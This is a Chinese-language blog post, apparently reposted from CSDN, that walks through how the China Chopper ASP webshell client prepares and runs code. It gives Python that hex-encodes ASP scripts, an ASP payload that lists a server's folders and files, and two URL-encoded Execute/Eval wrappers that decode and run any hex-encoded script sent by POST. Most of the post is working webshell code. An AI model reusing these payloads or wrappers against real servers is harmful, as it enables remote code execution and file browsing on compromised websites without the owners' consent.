首页 » 技术分享 » ASP 一句话执行ASP代码

ASP 一句话执行ASP代码

 

读取文件

self.asp_data=txt_Handle.asp_Handle(self.open_txt("asp.asp"))  #asp内容

def asp_Handle(ASP_data):
    ASP_data=asp_x0_zs(ASP_data)  #清除<% %>
    #ASP_data=asp_x2_zs(ASP_data)  #清除'注释
    #ASP_data=open_file_null(ASP_data)     #清除空行
    #ASP_data=asp_x2_zs(ASP_data) #清除'注释
    #ASP_data=str_char(ASP_data)  #对字符串处理
    #ASP_data=urllib.quote(ASP_data)  #quote URL编码
    print ASP_data
    ASP_data=asp_shell(binascii.b2a_hex(ASP_data.encode("utf8")))  #hex
    #ASP_data=urllib.quote(ASP_data)  #quote URL编码
    return ASP_data

对ASP代码做一些处理

Dim RR:RR=bd(Request("z1")):Function FD(dt):FD=Year(dt)&"-":If Len(Month(dt))=1 Then:FD = FD&"0":End If:FD=FD&Month(dt)&"-":If Len(Day(dt))=1 Then:FD=FD&"0":End If:FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":":If Len(Second(dt))=1 Then:FD=FD&"0":End If:FD=FD&Second(dt):End Function:SET C=CreateObject("Scripting.FileSystemObject"):Set FO=C.GetFolder(""&RR&""):If Err Then:Response.Write("ERROR:// "&Err.Description):Err.Clear:Else:For Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10):Next:For Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10):Next:End If

在看菜刀的时候看菜刀对内容做出了一些处理  

但是在菜刀的自写脚本中  并未对特殊字符做出处理     但是我在测试的时候还是发现还是要对一些字符做出处理否则无法运行  比如“

Response.Write("http://blog.csdn.net/webxscan")

strA = "document.write("&chr(34)&");"

##################################################################

上边说的是代码部分的处理

下面说代码的执行

{PASS}=Execute("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""{SCRIPT}"""")):Response.Write(""""|<-""""):Response.End"")")

#########

long=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""----------------"""")):Response.Write(""""|<-""""):Response.End"")")

这是执行   将代码转换成hex就行了放在{SCRIPT}  里

然后POST提交就行了

有兴趣可以联系我   神龙:QQ:29295842

blog: http://blog.csdn.net/webxscan

转载自原文链接, 如需删除请联系管理员。

原文链接:ASP 一句话执行ASP代码,转载请注明来源!

0